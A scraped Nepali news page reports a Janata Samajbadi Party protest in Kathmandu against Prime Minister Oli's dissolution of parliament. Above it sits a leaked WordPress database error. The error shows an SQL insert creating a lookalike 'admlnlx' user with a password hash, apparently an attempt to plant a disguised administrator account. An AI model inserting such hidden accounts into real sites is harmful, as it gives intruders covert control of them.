WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BaC/qrE0HNpvkUqmz06AejfrBnGn1l.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:24:42', '', 'admlnlx', 'admlnlx')
काठमाडौं । संसद बिगठन गर्ने प्रधानमन्त्री केपी शर्मा ओलीको कदमविरुद्ध जनता समाजवादी पार्टी (जसपा) नेपालले आज आइतबार काठमाडौंमा विरोध प्रदर्शन गरेको छ ।
जसपाले ओलीको कदम असंवैधानिक भएको भन्दै त्यसलाई खारेज गर्न माग गरेको छ । रत्नपार्क शान्तिबाटिकाबाट जुलुस सुरु भएको छ । पुतली सडक हुँदै पुनः शान्तिबाटिकामै पुगेर विरोध र्याली कोणसभामा परिणत जसपाको सचिवालयले जनाएको छ ।